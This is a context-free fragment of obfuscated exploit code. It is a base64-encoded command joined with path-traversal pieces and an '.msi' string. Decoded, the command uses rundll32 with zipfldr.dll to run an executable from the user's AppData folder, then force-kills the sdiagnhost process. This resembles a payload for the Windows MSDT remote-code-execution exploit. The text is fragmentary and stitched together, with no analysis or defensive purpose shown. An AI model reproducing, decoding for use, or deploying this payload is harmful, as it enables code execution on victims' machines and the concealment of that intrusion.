"RWVwKDMpO1J1bkRsbDMyLkVYZSB6aXBmbGRyLmRsbCxSb3V0ZVRoZUNhbGwgIiRFbnY6QVBQREFUQVxDYmh0ci5leGUiO3NUb3AtUFJPQ0VzcyAtZm9SQ0UgLU5hbWUgJ3NkaWFnbmhvc3Qn'+" + "[Char]34+'))" + "'))))" + "T" + "i" + "/../../../" + "../../../../../../../" + ".mS" + "i" + " " + "\""; |